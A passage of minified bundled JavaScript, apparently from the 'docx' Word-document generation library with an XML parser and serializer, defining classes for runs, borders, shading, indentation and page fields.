b[g.parentKey],b=ye}function ee(le){g.ignoreCdata||(g.trim&&(le=le.trim()),D("cdata",le))}function se(le){g.ignoreDoctype||(le=le.replace(/^ /,""),g.trim&&(le=le.trim()),D("doctype",le))}function ve(le){le.note=le}Q.exports=function(le,ye){var z=_.parser(!0,{}),l={};if(b=l,g=y.copyOptions(ye),y.ensureFlagExists("ignoreDeclaration",g),y.ensureFlagExists("ignoreInstruction",g),y.ensureFlagExists("ignoreAttributes",g),y.ensureFlagExists("ignoreText",g),y.ensureFlagExists("ignoreComment",g),y.ensureFlagExists("ignoreCdata",g),y.ensureFlagExists("ignoreDoctype",g),y.ensureFlagExists("compact",g),y.ensureFlagExists("alwaysChildren",g),y.ensureFlagExists("addParent",g),y.ensureFlagExists("trim",g),y.ensureFlagExists("nativeType",g),y.ensureFlagExists("nativeTypeAttributes",g),y.ensureFlagExists("sanitize",g),y.ensureFlagExists("instructionHasAttributes",g),y.ensureFlagExists("captureSpacesBetweenElements",g),y.ensureAlwaysArrayExists(g),y.ensureKeyExists("declaration",g),y.ensureKeyExists("instruction",g),y.ensureKeyExists("attributes",g),y.ensureKeyExists("text",g),y.ensureKeyExists("comment",g),y.ensureKeyExists("cdata",g),y.ensureKeyExists("doctype",g),y.ensureKeyExists("type",g),y.ensureKeyExists("name",g),y.ensureKeyExists("elements",g),y.ensureKeyExists("parent",g),y.checkFnExists("doctype",g),y.checkFnExists("instruction",g),y.checkFnExists("cdata",g),y.checkFnExists("comment",g),y.checkFnExists("text",g),y.checkFnExists("instructionName",g),y.checkFnExists("elementName",g),y.checkFnExists("attributeName",g),y.checkFnExists("attributeValue",g),y.checkFnExists("attributes",g),z.opt={strictEntities:!0},z.onopentag=S,z.ontext=O,z.oncomment=U,z.onclosetag=K,z.onerror=ve,z.oncdata=ee,z.ondoctype=se,z.onprocessinginstruction=x,z.write(le).close(),l[g.elementsKey]){var f=l[g.elementsKey];delete l[g.elementsKey],l[g.elementsKey]=f,delete l.text}return l}},1388:(Q,F,E)=>{var g=E(4740),b=E(1229);Q.exports=function(_,y){var M,p,D,x;return x=g.copyOptions(y),g.ensureSpacesExists(x),p=b(_,M=x),D="compact"in M&&M.compact?"_parent":"parent",("addParent"in M&&M.addParent?JSON.stringify(p,function(w,x){return w===D?"_":x},M.spaces):JSON.stringify(p,null,M.spaces)).replace(/\u2028/g,"\\u2028").replace(/\u2029/g,"\\u2029")}},255:Q=>{var F={"&":"&amp;",'"':"&quot;","'":"&apos;","<":"&lt;",">":"&gt;"};Q.exports=function(E){return E&&E.replace?E.replace(/([&"<>'])/g,function(g,b){return F[b]}):E}},3479:(Q,F,E)=>{var g=E(4155),b=E(255),_=E(2830).Stream;function y(p,D,w){w=w||0;var x,S,O=(x=D,new Array(w||0).join(x||"")),U=p;if("object"==typeof p&&(U=p[S=Object.keys(p)[0]])&&U._elem)return U._elem.name=S,U._elem.icount=w,U._elem.indent=D,U._elem.indents=O,U._elem.interrupt=U,U._elem;var K,ee=[],se=[];function ve(le){Object.keys(le).forEach(function(ye){ee.push(ye+'="'+b(le[ye])+'"')})}switch(typeof U){case"object":if(null===U)break;U._attr&&ve(U._attr),U._cdata&&se.push(("<![CDATA["+U._cdata).replace(/\]\]>/g,"]]]]><![CDATA[>")+"]]>"),U.forEach&&(K=!1,se.push(""),U.forEach(function(le){"object"==typeof le?"_attr"==Object.keys(le)[0]?ve(le._attr):se.push(y(le,D,w+1)):(se.pop(),K=!0,se.push(b(le)))}),K||se.push(""));break;default:se.push(b(U))}return{name:S,interrupt:!1,attributes:ee,content:se,icount:w,indents:O,indent:D}}function M(p,D,w){if("object"!=typeof D)return p(!1,D);var x=D.interrupt?1:D.content.length;function S(){for(;D.content.length;){var U=D.content.shift();if(void 0!==U){if(O(U))return;M(p,U)}}p(!1,(x>1?D.indents:"")+(D.name?"</"+D.name+">":"")+(D.indent&&!w?"\n":"")),w&&w()}function O(U){return!!U.interrupt&&(U.interrupt.append=p,U.interrupt.end=S,U.interrupt=!1,p(!0),!0)}if(p(!1,D.indents+(D.name?"<"+D.name:"")+(D.attributes.length?" "+D.attributes.join(" "):"")+(x?D.name?">":"":D.name?"/>":"")+(D.indent&&x>1?"\n":"")),!x)return p(!1,D.indent?"\n":"");O(D)||S()}Q.exports=function(p,D){"object"!=typeof D&&(D={indent:D});var w,x,S=D.stream?new _:null,O="",U=!1,K=D.indent?!0===D.indent?"    ":D.indent:"",ee=!0;function se(z){ee?g.nextTick(z):z()}function ve(z,l){if(void 0!==l&&(O+=l),z&&!U&&(S=S||new _,U=!0),z&&U){var f=O;se(function(){S.emit("data",f)}),O=""}}function le(z,l){M(ve,y(z,K,K?1:0),l)}function ye(){if(S){var z=O;se(function(){S.emit("data",z),S.emit("end"),S.readable=!1,S.emit("close")})}}return se(function(){ee=!1}),D.declaration&&(x={version:"1.0",encoding:(w=D.declaration).encoding||"UTF-8"},w.standalone&&(x.standalone=w.standalone),le({"?xml":{_attr:x}}),O=O.replace("/>","?>")),p&&p.forEach?p.forEach(function(z,l){var f;l+1===p.length&&(f=ye),le(z,f)}):le(p,ye),S?(S.readable=!0,S):O},Q.exports.element=Q.exports.Element=function(){var p=Array.prototype.slice.call(arguments),D={_elem:y(p),push:function(w){if(!this.append)throw new Error("not assigned to a parent!");var x=this,S=this._elem.indent;M(this.append,y(w,S,this._elem.icount+(S?1:0)),function(){x.append(!0)})},close:function(w){void 0!==w&&this.push(w),this.end&&this.end()}};return D}}},$={};function ae(Q){var F=$[Q];if(void 0!==F)return F.exports;var E=$[Q]={exports:{}};return j[Q].call(E.exports,E,E.exports,ae),E.exports}ae.d=(Q,F)=>{for(var E in F)ae.o(F,E)&&!ae.o(Q,E)&&Object.defineProperty(Q,E,{enumerable:!0,get:F[E]})},ae.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(Q){if("object"==typeof window)return window}}(),ae.o=(Q,F)=>Object.prototype.hasOwnProperty.call(Q,F),ae.r=Q=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(Q,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(Q,"__esModule",{value:!0})};var I={};return(()=>{"use strict";ae.r(I),ae.d(I,{AbstractNumbering:()=>md,Alignment:()=>X,AlignmentAttributes:()=>G,AlignmentType:()=>O,Attributes:()=>_,BaseEmphasisMark:()=>rt,BaseXmlComponent:()=>Q,Body:()=>Hs,Bookmark:()=>i_,BookmarkEnd:()=>r0,BookmarkStart:()=>yi,Border:()=>R,BorderElement:()=>L,BorderStyle:()=>U,Column:()=>tr,ColumnAttributes:()=>Oc,ColumnBreak:()=>ec,Columns:()=>Bm,ColumnsAttributes:()=>ds,Comment:()=>Bs,CommentRangeEnd:()=>Vm,CommentRangeStart:()=>Da,CommentReference:()=>vf,Comments:()=>Jp,ConcreteHyperlink:()=>qd,ConcreteNumbering:()=>ih,DeletedTextRun:()=>P_,DocGridAttributes:()=>Wl,Document:()=>S_,DocumentAttributes:()=>ko,DocumentBackground:()=>rd,DocumentBackgroundAttributes:()=>Gd,DocumentDefaults:()=>Wf,DocumentGrid:()=>xs,DocumentGridType:()=>Ho,DotEmphasisMark:()=>Qe,Drawing:()=>Ci,DropCapType:()=>Nc,EMPTY_OBJECT:()=>F,EmphasisMark:()=>Ge,EmphasisMarkType:()=>ve,ExternalHyperlink:()=>Wt,File:()=>S_,FootNoteReferenceRunAttributes:()=>CC,FootNotes:()=>Zu,Footer:()=>VM,FooterWrapper:()=>hl,FootnoteReference:()=>Er,FootnoteReferenceRun:()=>k_,FrameAnchorType:()=>n_,FrameProperties:()=>Gu,FramePropertiesAttributes:()=>Is,FrameWrap:()=>us,GridSpan:()=>u_,Header:()=>im,HeaderFooterReference:()=>zl,HeaderFooterReferenceType:()=>Pt,HeaderFooterType:()=>Xt,HeaderWrapper:()=>pl,HeadingLevel:()=>Qn,HeightRule:()=>Yu,HorizontalPosition:()=>Vn,HorizontalPositionAlign:()=>hd,HorizontalPositionRelativeFrom:()=>pa,HpsMeasureElement:()=>f,HyperlinkType:()=>ii,IgnoreIfEmptyXmlComponent:()=>g,ImageRun:()=>Hu,ImportDotx:()=>bC,ImportedRootElementAttributes:()=>w,ImportedXmlComponent:()=>D,Indent:()=>ue,InitializableXmlComponent:()=>S,InsertedTextRun:()=>oh,InternalHyperlink:()=>H2,LeaderType:()=>Zt,Level:()=>A_,LevelBase:()=>th,LevelForOverride:()=>jm,LevelFormat:()=>ks,LevelOverride:()=>hC,LevelSuffix:()=>Xd,LineNumberAttributes:()=>qu,LineNumberRestartFormat:()=>Qt,LineNumberType:()=>ws,LineRuleType:()=>qt,Math:()=>gr,MathAccentCharacter:()=>l0,MathAngledBrackets:()=>$d,MathBase:()=>hc,MathCurlyBrackets:()=>zM,MathDegree:()=>f0,MathDenominator:()=>c0,MathFraction:()=>OM,MathFunction:()=>fc,MathFunctionName:()=>If,MathFunctionProperties:()=>Qu,MathLimitLocation:()=>d0,MathNAryProperties:()=>Tf,MathNumerator:()=>ju,MathPreSubSuperScript:()=>sa,MathPreSubSuperScriptProperties:()=>u0,MathRadical:()=>X2,MathRadicalProperties:()=>r_,MathRoundBrackets:()=>Ar,MathRun:()=>PM,MathSquareBrackets:()=>J2,MathSubScript:()=>LM,MathSubScriptElement:()=>Ef,MathSubScriptProperties:()=>$2,MathSubSuperScript:()=>Qd,MathSubSuperScriptProperties:()=>K2,MathSum:()=>m0,MathSuperScript:()=>xf,MathSuperScriptElement:()=>Df,MathSuperScriptProperties:()=>o_,Media:()=>dd,NumberFormat:()=>O_,NumberProperties:()=>Xn,NumberValueElement:()=>v,Numbering:()=>I0,OnOffElement:()=>l,OutlineLevel:()=>Uu,OverlapType:()=>be,Packer:()=>L_,PageBorderDisplay:()=>ei,PageBorderOffsetFrom:()=>$o,PageBorderZOrder:()=>ai,PageBorders:()=>a_,PageBreak:()=>Pc,PageBreakBefore:()=>V2,PageMargin:()=>Vi,PageMarginAttributes:()=>xo,PageNumber:()=>ye,PageNumberSeparator:()=>$t,PageNumberType:()=>wo,PageNumberTypeAttributes:()=>Ia,PageOrientation:()=>zo,PageReference:()=>Fr,PageSize:()=>Fl,PageSizeAttributes:()=>_n,PageTextDirection:()=>Vl,PageTextDirectionType:()=>Ut,Paragraph:()=>uc,ParagraphProperties:()=>dl,ParagraphPropertiesDefaults:()=>em,PrettifyType:()=>ch,RelativeHorizontalPosition:()=>Kd,RelativeVerticalPosition:()=>_c,Run:()=>pt,RunFonts:()=>We,RunProperties:()=>$e,RunPropertiesChange:()=>st,RunPropertiesDefaults:()=>R_,SectionProperties:()=>ms,SectionType:()=>Yt,SectionTypeAttributes:()=>er,SequentialIdentifier:()=>a0,Shading:()=>me,ShadingType:()=>se,SimpleField:()=>Xp,SimpleMailMergeField:()=>Ll,SimplePos:()=>Va,SpaceType:()=>ee,Spacing:()=>dc,StringContainer:()=>P,StringValueElement:()=>A,Style:()=>vo,StyleForCharacter:()=>ud,StyleForParagraph:()=>Zd,StyleLevel:()=>gC,Styles:()=>Hl,SymbolRun:()=>zt,TDirection:()=>Sf,Tab:()=>W2,TabAttributes:()=>B2,TabStop:()=>Zp,TabStopItem:()=>Ud,TabStopPosition:()=>Bo,TabStopType:()=>Kt,Table:()=>C0,TableAnchorType:()=>kf,TableBorders:()=>Rn,TableCell:()=>f_,TableCellBorders:()=>sd,TableFloatOptionsAttributes:()=>_0,TableFloatProperties:()=>aC,TableLayout:()=>fs,TableLayoutType:()=>Xu,TableOfContents:()=>FM,TableOverlap:()=>or,TableProperties:()=>ml,TableRow:()=>b0,TableRowHeight:()=>ul,TableRowHeightAttributes:()=>cd,TableRowProperties:()=>y0,TableWidthElement:()=>Rs,TextDirection:()=>Um,TextRun:()=>vt,TextWrappingSide:()=>Co,TextWrappingType:()=>Gt,ThematicBreak:()=>J,Type:()=>Bl,Underline:()=>Le,UnderlineType:()=>le,VerticalAlign:()=>pn,VerticalAlignAttributes:()=>Un,VerticalAlignElement:()=>ur,VerticalMerge:()=>h_,VerticalMergeType:()=>$u,VerticalPosition:()=>Pn,VerticalPositionAlign:()=>Zm,VerticalPositionRelativeFrom:()=>Jt,WORKAROUND:()=>ni,WORKAROUND2:()=>eh,WORKAROUND3:()=>x,WORKAROUND4:()=>h0,WidthType:()=>Lc,WrapNone:()=>cs,WrapSquare:()=>nd,WrapTight:()=>ll,WrapTopAndBottom:()=>Bu,XmlAttributeComponent:()=>b,XmlComponent:()=>E,convertInchesToTwip:()=>ir.convertInchesToTwip,convertMillimetersToTwip:()=>ir.convertMillimetersToTwip,convertToXmlComponent:()=>M,dateTimeValue:()=>ir.dateTimeValue,decimalNumber:()=>ir.decimalNumber,eighthPointMeasureValue:()=>ir.eighthPointMeasureValue,hexColorValue:()=>ir.hexColorValue,hpsMeasureValue:()=>ir.hpsMeasureValue,longHexNumber:()=>ir.longHexNumber,measurementOrPercentValue:()=>ir.measurementOrPercentValue,percentageValue:()=>ir.percentageValue,pointMeasureValue:()=>ir.pointMeasureValue,positiveUniversalMeasureValue:()=>ir.positiveUniversalMeasureValue,sectionMarginDefaults:()=>tc,sectionPageSizeDefaults:()=>$a,shortHexNumber:()=>ir.shortHexNumber,signedHpsMeasureValue:()=>ir.signedHpsMeasureValue,signedTwipsMeasureValue:()=>ir.signedTwipsMeasureValue,twipsMeasureValue:()=>ir.twipsMeasureValue,uCharHexNumber:()=>ir.uCharHexNumber,uniqueId:()=>ir.uniqueId,uniqueNumericId:()=>ir.uniqueNumericId,universalMeasureValue:()=>ir.universalMeasureValue,unsignedDecimalNumber:()=>ir.unsignedDecimalNumber});class Q{constructor(Ce){this.rootKey=Ce}}const F=Object.seal({});class E extends Q{constructor(Ce){super(Ce),this.root=new Array}prepForXml(Ce){var nt;const Dt=this.root.map(di=>di instanceof Q?di.prepForXml(Ce):di).filter(di=>void 0!==di);return{[this.rootKey]:Dt.length?1===Dt.length&&(null===(nt=Dt[0])||void 0===nt?void 0:nt._attr)?Dt[0]:Dt:F}}addChildElement(Ce){return this.root.push(Ce),this}}class g extends E{prepForXml(Ce){const nt=super.prepForXml(Ce);if(nt&&("object"!=typeof nt[this.rootKey]||Object.keys(nt[this.rootKey]).length))return nt}}class b extends Q{constructor(Ce){super("_attr"),this.root=Ce}prepForXml(Ce){const nt={};return Object.keys(this.root).forEach(Dt=>{const di=this.root[Dt];void 0!==di&&(nt[this.xmlKeys&&this.xmlKeys[Dt]||Dt]=di)}),{_attr:nt}}}class _ extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val",color:"w:color",fill:"w:fill",space:"w:space",sz:"w:sz",type:"w:type",rsidR:"w:rsidR",rsidRPr:"w:rsidRPr",rsidSect:"w:rsidSect",w:"w:w",h:"w:h",top:"w:top",right:"w:right",bottom:"w:bottom",left:"w:left",header:"w:header",footer:"w:footer",gutter:"w:gutter",linePitch:"w:linePitch",pos:"w:pos"}}}var y=ae(7888);const M=Se=>{switch(Se.type){case void 0:case"element":const Ce=new D(Se.name,Se.attributes),nt=Se.elements||[];for(const Dt of nt){const di=M(Dt);void 0!==di&&Ce.push(di)}return Ce;case"text":return Se.text;default:return}};class p extends b{}class D extends E{static fromXmlString(Ce){const nt=(0,y.xml2js)(Ce,{compact:!1});return M(nt)}constructor(Ce,nt){super(Ce),nt&&this.root.push(new p(nt))}push(Ce){this.root.push(Ce)}}class w extends E{constructor(Ce){super(""),this._attr=Ce}prepForXml(Ce){return{_attr:this._attr}}}const x="";class S extends E{constructor(Ce,nt){super(Ce),nt&&(this.root=nt.root)}}var O,U,K,ee,se,ve,le,ye,Se,z=ae(6595);class l extends E{constructor(Ce,nt=!0){super(Ce),!0!==nt&&this.root.push(new _({val:nt}))}}class f extends E{constructor(Ce,nt){super(Ce),this.root.push(new _({val:(0,z.KR)(nt)}))}}class A extends E{constructor(Ce,nt){super(Ce),this.root.push(new _({val:nt}))}}class v extends E{constructor(Ce,nt){super(Ce),this.root.push(new _({val:nt}))}}class P extends E{constructor(Ce,nt){super(Ce),this.root.push(nt)}}(Se=O||(O={})).START="start",Se.END="end",Se.CENTER="center",Se.BOTH="both",Se.JUSTIFIED="both",Se.DISTRIBUTE="distribute",Se.LEFT="left",Se.RIGHT="right";class G extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class X extends E{constructor(Ce){super("w:jc"),this.root.push(new G({val:Ce}))}}class L extends E{constructor(Ce,{color:nt,size:Dt,space:di,style:pi}){super(Ce),this.root.push(new h({style:pi,color:void 0===nt?void 0:(0,z.dg)(nt),size:void 0===Dt?void 0:(0,z.LV)(Dt),space:void 0===di?void 0:(0,z.gg)(di)}))}}class h extends b{constructor(){super(...arguments),this.xmlKeys={style:"w:val",color:"w:color",size:"w:sz",space:"w:space"}}}!function(Se){Se.SINGLE="single",Se.DASH_DOT_STROKED="dashDotStroked",Se.DASHED="dashed",Se.DASH_SMALL_GAP="dashSmallGap",Se.DOT_DASH="dotDash",Se.DOT_DOT_DASH="dotDotDash",Se.DOTTED="dotted",Se.DOUBLE="double",Se.DOUBLE_WAVE="doubleWave",Se.INSET="inset",Se.NIL="nil",Se.NONE="none",Se.OUTSET="outset",Se.THICK="thick",Se.THICK_THIN_LARGE_GAP="thickThinLargeGap",Se.THICK_THIN_MEDIUM_GAP="thickThinMediumGap",Se.THICK_THIN_SMALL_GAP="thickThinSmallGap",Se.THIN_THICK_LARGE_GAP="thinThickLargeGap",Se.THIN_THICK_MEDIUM_GAP="thinThickMediumGap",Se.THIN_THICK_SMALL_GAP="thinThickSmallGap",Se.THIN_THICK_THIN_LARGE_GAP="thinThickThinLargeGap",Se.THIN_THICK_THIN_MEDIUM_GAP="thinThickThinMediumGap",Se.THIN_THICK_THIN_SMALL_GAP="thinThickThinSmallGap",Se.THREE_D_EMBOSS="threeDEmboss",Se.THREE_D_ENGRAVE="threeDEngrave",Se.TRIPLE="triple",Se.WAVE="wave"}(U||(U={}));class R extends g{constructor(Ce){super("w:pBdr"),Ce.top&&this.root.push(new L("w:top",Ce.top)),Ce.bottom&&this.root.push(new L("w:bottom",Ce.bottom)),Ce.left&&this.root.push(new L("w:left",Ce.left)),Ce.right&&this.root.push(new L("w:right",Ce.right))}}class J extends E{constructor(){super("w:pBdr");const Ce=new L("w:bottom",{color:"auto",space:1,style:U.SINGLE,size:6});this.root.push(Ce)}}class Z extends b{constructor(){super(...arguments),this.xmlKeys={start:"w:start",end:"w:end",left:"w:left",right:"w:right",hanging:"w:hanging",firstLine:"w:firstLine"}}}class ue extends E{constructor({start:Ce,end:nt,left:Dt,right:di,hanging:pi,firstLine:Hi}){super("w:ind"),this.root.push(new Z({start:void 0===Ce?void 0:(0,z.xb)(Ce),end:void 0===nt?void 0:(0,z.xb)(nt),left:void 0===Dt?void 0:(0,z.xb)(Dt),right:void 0===di?void 0:(0,z.xb)(di),hanging:void 0===pi?void 0:(0,z.Jd)(pi),firstLine:void 0===Hi?void 0:(0,z.Jd)(Hi)}))}}class Ie extends E{constructor(){super("w:br")}}!function(Se){Se.BEGIN="begin",Se.END="end",Se.SEPARATE="separate"}(K||(K={}));class Ae extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:fldCharType",dirty:"w:dirty"}}}class Ue extends E{constructor(Ce){super("w:fldChar"),this.root.push(new Ae({type:K.BEGIN,dirty:Ce}))}}class Xe extends E{constructor(Ce){super("w:fldChar"),this.root.push(new Ae({type:K.SEPARATE,dirty:Ce}))}}class He extends E{constructor(Ce){super("w:fldChar"),this.root.push(new Ae({type:K.END,dirty:Ce}))}}!function(Se){Se.DEFAULT="default",Se.PRESERVE="preserve"}(ee||(ee={}));class Be extends b{constructor(){super(...arguments),this.xmlKeys={space:"xml:space"}}}class qe extends E{constructor(){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("PAGE")}}class De extends E{constructor(){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("NUMPAGES")}}class Ve extends E{constructor(){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("SECTIONPAGES")}}class ze extends b{constructor(){super(...arguments),this.xmlKeys={fill:"w:fill",color:"w:color",type:"w:val"}}}class me extends E{constructor({fill:Ce,color:nt,type:Dt}){super("w:shd"),this.root.push(new ze({fill:void 0===Ce?void 0:(0,z.dg)(Ce),color:void 0===nt?void 0:(0,z.dg)(nt),type:Dt}))}}!function(Se){Se.CLEAR="clear",Se.DIAGONAL_CROSS="diagCross",Se.DIAGONAL_STRIPE="diagStripe",Se.HORIZONTAL_CROSS="horzCross",Se.HORIZONTAL_STRIPE="horzStripe",Se.NIL="nil",Se.PERCENT_5="pct5",Se.PERCENT_10="pct10",Se.PERCENT_12="pct12",Se.PERCENT_15="pct15",Se.PERCENT_20="pct20",Se.PERCENT_25="pct25",Se.PERCENT_30="pct30",Se.PERCENT_35="pct35",Se.PERCENT_37="pct37",Se.PERCENT_40="pct40",Se.PERCENT_45="pct45",Se.PERCENT_50="pct50",Se.PERCENT_55="pct55",Se.PERCENT_60="pct60",Se.PERCENT_62="pct62",Se.PERCENT_65="pct65",Se.PERCENT_70="pct70",Se.PERCENT_75="pct75",Se.PERCENT_80="pct80",Se.PERCENT_85="pct85",Se.PERCENT_87="pct87",Se.PERCENT_90="pct90",Se.PERCENT_95="pct95",Se.REVERSE_DIAGONAL_STRIPE="reverseDiagStripe",Se.SOLID="solid",Se.THIN_DIAGONAL_CROSS="thinDiagCross",Se.THIN_DIAGONAL_STRIPE="thinDiagStripe",Se.THIN_HORIZONTAL_CROSS="thinHorzCross",Se.THIN_REVERSE_DIAGONAL_STRIPE="thinReverseDiagStripe",Se.THIN_VERTICAL_STRIPE="thinVertStripe",Se.VERTICAL_STRIPE="vertStripe"}(se||(se={}));class Ke extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id",author:"w:author",date:"w:date"}}}!function(Se){Se.DOT="dot"}(ve||(ve={}));class rt extends E{constructor(Ce){super("w:em"),this.root.push(new _({val:Ce}))}}class Ge extends rt{constructor(Ce=ve.DOT){super(Ce)}}class Qe extends rt{constructor(){super(ve.DOT)}}class ht extends E{constructor(Ce){super("w:spacing"),this.root.push(new _({val:(0,z.xb)(Ce)}))}}class mt extends E{constructor(Ce){super("w:color"),this.root.push(new _({val:(0,z.dg)(Ce)}))}}class lt extends E{constructor(Ce){super("w:highlight"),this.root.push(new _({val:Ce}))}}class ft extends E{constructor(Ce){super("w:highlightCs"),this.root.push(new _({val:Ce}))}}class xe extends b{constructor(){super(...arguments),this.xmlKeys={ascii:"w:ascii",cs:"w:cs",eastAsia:"w:eastAsia",hAnsi:"w:hAnsi",hint:"w:hint"}}}class We extends E{constructor(Ce,nt){super("w:rFonts"),this.root.push(new xe("string"==typeof Ce?{ascii:Ce,cs:Ce,eastAsia:Ce,hAnsi:Ce,hint:nt}:Ce))}}class Je extends E{constructor(Ce){super("w:vertAlign"),this.root.push(new _({val:Ce}))}}class Oe extends Je{constructor(){super("superscript")}}class Te extends Je{constructor(){super("subscript")}}!function(Se){Se.SINGLE="single",Se.WORDS="words",Se.DOUBLE="double",Se.THICK="thick",Se.DOTTED="dotted",Se.DOTTEDHEAVY="dottedHeavy",Se.DASH="dash",Se.DASHEDHEAVY="dashedHeavy",Se.DASHLONG="dashLong",Se.DASHLONGHEAVY="dashLongHeavy",Se.DOTDASH="dotDash",Se.DASHDOTHEAVY="dashDotHeavy",Se.DOTDOTDASH="dotDotDash",Se.DASHDOTDOTHEAVY="dashDotDotHeavy",Se.WAVE="wave",Se.WAVYHEAVY="wavyHeavy",Se.WAVYDOUBLE="wavyDouble"}(le||(le={}));class Le extends E{constructor(Ce=le.SINGLE,nt){super("w:u"),this.root.push(new _({val:Ce,color:void 0===nt?void 0:(0,z.dg)(nt)}))}}class $e extends g{constructor(Ce){var nt,Dt;if(super("w:rPr"),!Ce)return;void 0!==Ce.bold&&this.push(new l("w:b",Ce.bold)),(void 0===Ce.boldComplexScript&&void 0!==Ce.bold||Ce.boldComplexScript)&&this.push(new l("w:bCs",null!==(nt=Ce.boldComplexScript)&&void 0!==nt?nt:Ce.bold)),void 0!==Ce.italics&&this.push(new l("w:i",Ce.italics)),(void 0===Ce.italicsComplexScript&&void 0!==Ce.italics||Ce.italicsComplexScript)&&this.push(new l("w:iCs",null!==(Dt=Ce.italicsComplexScript)&&void 0!==Dt?Dt:Ce.italics)),Ce.underline&&this.push(new Le(Ce.underline.type,Ce.underline.color)),Ce.emphasisMark&&this.push(new Ge(Ce.emphasisMark.type)),Ce.color&&this.push(new mt(Ce.color)),void 0!==Ce.size&&this.push(new f("w:sz",Ce.size));const di=void 0===Ce.sizeComplexScript||!0===Ce.sizeComplexScript?Ce.size:Ce.sizeComplexScript;di&&this.push(new f("w:szCs",di)),void 0!==Ce.rightToLeft&&this.push(new l("w:rtl",Ce.rightToLeft)),void 0!==Ce.smallCaps?this.push(new l("w:smallCaps",Ce.smallCaps)):void 0!==Ce.allCaps&&this.push(new l("w:caps",Ce.allCaps)),void 0!==Ce.strike&&this.push(new l("w:strike",Ce.strike)),void 0!==Ce.doubleStrike&&this.push(new l("w:dstrike",Ce.doubleStrike)),Ce.subScript&&this.push(new Te),Ce.superScript&&this.push(new Oe),Ce.style&&this.push(new A("w:rStyle",Ce.style)),Ce.font&&this.push("string"==typeof Ce.font?new We(Ce.font):"name"in Ce.font?new We(Ce.font.name,Ce.font.hint):new We(Ce.font)),Ce.highlight&&this.push(new lt(Ce.highlight));const pi=void 0===Ce.highlightComplexScript||!0===Ce.highlightComplexScript?Ce.highlight:Ce.highlightComplexScript;pi&&this.push(new ft(pi)),Ce.characterSpacing&&this.push(new ht(Ce.characterSpacing)),void 0!==Ce.emboss&&this.push(new l("w:emboss",Ce.emboss)),void 0!==Ce.imprint&&this.push(new l("w:imprint",Ce.imprint)),Ce.shading&&this.push(new me(Ce.shading)),Ce.revision&&this.push(new st(Ce.revision)),Ce.border&&this.push(new L("w:bdr",Ce.border))}push(Ce){this.root.push(Ce)}}class st extends E{constructor(Ce){super("w:rPrChange"),this.root.push(new Ke({id:Ce.id,author:Ce.author,date:Ce.date})),this.addChildElement(new $e(Ce))}}class xt extends E{constructor(Ce){super("w:t"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push(Ce)}}!function(Se){Se.CURRENT="CURRENT",Se.TOTAL_PAGES="TOTAL_PAGES",Se.TOTAL_PAGES_IN_SECTION="TOTAL_PAGES_IN_SECTION"}(ye||(ye={}));class pt extends E{constructor(Ce){if(super("w:r"),this.properties=new $e(Ce),this.root.push(this.properties),Ce.break)for(let nt=0;nt<Ce.break;nt++)this.root.push(new Ie);if(Ce.space&&this.root.push(new Be({space:Ce.space})),Ce.children)for(const nt of Ce.children)if("string"!=typeof nt)this.root.push(nt);else switch(nt){case ye.CURRENT:this.root.push(new Ue),this.root.push(new qe),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES:this.root.push(new Ue),this.root.push(new De),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES_IN_SECTION:this.root.push(new Ue),this.root.push(new Ve),this.root.push(new Xe),this.root.push(new He);break;default:this.root.push(new xt(nt))}else Ce.text&&this.root.push(new xt(Ce.text))}}class vt extends pt{constructor(Ce){if("string"==typeof Ce)return super({}),this.root.push(new xt(Ce)),this;super(Ce)}}class Wi extends b{constructor(){super(...arguments),this.xmlKeys={char:"w:char",symbolfont:"w:font"}}}class Ft extends E{constructor(Ce="",nt="Wingdings"){super("w:sym"),this.root.push(new Wi({char:Ce,symbolfont:nt}))}}class zt extends pt{constructor(Ce){if("string"==typeof Ce)return super({}),void this.root.push(new Ft(Ce));super(Ce),this.root.push(new Ft(Ce.char,Ce.symbolfont))}}var pa,Jt,Gt,Co,jt,qt,Qn,Kt,Zt,Bo,ti,ii,pn,Pt,Xt,Ho,Qt,ei,$o,ai,$t,zo,Ut,Yt,ha=ae(5457);(function(Se){Se.CHARACTER="character",Se.COLUMN="column",Se.INSIDE_MARGIN="insideMargin",Se.LEFT_MARGIN="leftMargin",Se.MARGIN="margin",Se.OUTSIDE_MARGIN="outsideMargin",Se.PAGE="page",Se.RIGHT_MARGIN="rightMargin"})(pa||(pa={})),function(Se){Se.BOTTOM_MARGIN="bottomMargin",Se.INSIDE_MARGIN="insideMargin",Se.LINE="line",Se.MARGIN="margin",Se.OUTSIDE_MARGIN="outsideMargin",Se.PAGE="page",Se.PARAGRAPH="paragraph",Se.TOP_MARGIN="topMargin"}(Jt||(Jt={}));class Ha extends b{constructor(){super(...arguments),this.xmlKeys={x:"x",y:"y"}}}class Va extends E{constructor(){super("wp:simplePos"),this.root.push(new Ha({x:0,y:0}))}}class co extends E{constructor(Ce){super("wp:align"),this.root.push(Ce)}}class io extends E{constructor(Ce){super("wp:posOffset"),this.root.push(Ce.toString())}}class yo extends b{constructor(){super(...arguments),this.xmlKeys={relativeFrom:"relativeFrom"}}}class Vn extends E{constructor(Ce){if(super("wp:positionH"),this.root.push(new yo({relativeFrom:Ce.relative||pa.PAGE})),Ce.align)this.root.push(new co(Ce.align));else{if(void 0===Ce.offset)throw new Error("There is no configuration provided for floating position (Align or offset)");this.root.push(new io(Ce.offset))}}}class Eo extends b{constructor(){super(...arguments),this.xmlKeys={relativeFrom:"relativeFrom"}}}class Pn extends E{constructor(Ce){if(super("wp:positionV"),this.root.push(new Eo({relativeFrom:Ce.relative||Jt.PAGE})),Ce.align)this.root.push(new co(Ce.align));else{if(void 0===Ce.offset)throw new Error("There is no configuration provided for floating position (Align or offset)");this.root.push(new io(Ce.offset))}}}class lo extends b{constructor(){super(...arguments),this.xmlKeys={uri:"uri"}}}class ao extends 